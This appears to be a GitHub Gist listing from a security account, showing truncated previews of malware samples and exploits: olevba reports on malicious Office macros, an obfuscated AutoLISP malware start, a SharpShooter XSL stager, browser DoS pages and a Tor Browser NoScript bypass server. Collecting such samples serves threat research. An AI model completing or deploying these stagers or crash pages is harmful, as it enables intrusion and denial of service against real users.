@seclib
seclib / MacOffice
Created September 30, 2018 09:54
VBA MacOffice threat
## e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MASI-B-- e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
===============================================================================
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
@seclib
seclib / 887e9eaa7f6883725b24
Created September 24, 2018 10:57
Pentest VBA VBS sample
## Sample Hash: 80610bb3a5be887e9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:M-S-HB-- 9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
===============================================================================
FILE: 9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
@seclib
seclib / vba.threat
Created September 24, 2018 10:45
vba.threat
##############################################################################
## 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS-H--- 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
===============================================================================
FILE: 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
Type: OLE
@seclib
seclib / visio.vba.malicious
Created September 23, 2018 14:18
Visio Test Malicious VBA
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:M-S-H--- 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55
===============================================================================
FILE: 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: visio/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
@seclib
seclib / lisp_malware
Created September 23, 2018 14:02
LISP Malware
###################################################################
## 332ca1146b1478cc9ddda9be07815a48071b9e83081eb995f33379385d3258f2
(setq s::startup nil)
(setq *startup* (strcat (chr 40)
(chr 115)
(chr 101)
(chr 116)
(chr 113)
(chr 32)
@seclib
seclib / df4b56g78rt97n8978u97k889rg7fds45fv64dcx
Created September 21, 2018 06:39
XSL stager - Sharp shooter
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:sharp="http://sharp.shooter/mynamespace">
<msxsl:script language="JScript" implements-prefix="sharp">
function shooter(nodelist) {
<![CDATA[
function setversion() {
@seclib
seclib / ccddef1beae0d1c7962b1783003
Created September 21, 2018 06:27
VBA XLS Threat
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MAS-H--- 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
===============================================================================
FILE: 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
@seclib
seclib / seclib_safary_dead.html
Created September 17, 2018 12:51
Safari DoS ☠️
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
body {
background: repeat url('data:image/jpeg;base64,
@seclib
seclib / torbb.py
Created September 11, 2018 16:47
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
    #Handler for the GET requests
    def do_GET(self):
        self.send_response(200)
@seclib
seclib / ubDoS.html
Created September 11, 2018 15:26
Universal Browser DoS
<title>Title / History</title>
<script>
if (navigator.userAgent.indexOf('Chrome') == -1 && navigator.userAgent.indexOf('Safari') > -1) {
if(!String.prototype.repeat){(function(){'use strict';
var defineProperty=(function(){try{var object={};
var $defineProperty=Object.defineProperty;
var result=$defineProperty(object,object,object)&&$defineProperty}catch(error){}return result}());
var repeat=function(count){if(this==null){throw TypeError()}
var string=String(this);